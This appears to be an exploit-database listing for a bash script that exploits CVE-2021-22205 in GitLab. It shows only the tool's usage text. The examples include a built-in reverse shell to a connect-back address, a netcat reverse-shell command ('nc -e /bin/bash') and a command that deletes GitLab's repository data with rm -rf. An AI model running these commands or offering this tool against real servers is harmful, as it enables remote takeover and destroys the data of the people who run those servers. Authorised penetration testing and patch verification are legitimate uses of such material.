Share
## https://sploitus.com/exploit?id=3A189A7D-D603-5FC3-8F3F-0AE71F99FA2B
# gitlab-cve-2021-22205
A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab

# Usage
```
Usage: cve-2021-22205.sh [options]
Options:
	-h,--help		Show this help
	-t,--target		Set the target server (i.e. "http://gitlab.example.com")
	-i,--reverse-ip		Set the IP to connect back to
	-p,--reverse-port	Set the port to connect back to
	-c,--command		Set the raw command to run instead of the built-in reverse shell (i.e. "nc -e /bin/bash 127.0.0.1 1337")
Examples:
	Use the built-in reverse shell payload:
		cve-2021-22205.sh -t http://gitlab.example.com -i 127.0.0.1 -p 1337
	Run a custom command:
		cve-2021-22205.sh -t http://gitlab.example.com -c "rm -rf /var/opt/gitlab/git-data/*"
```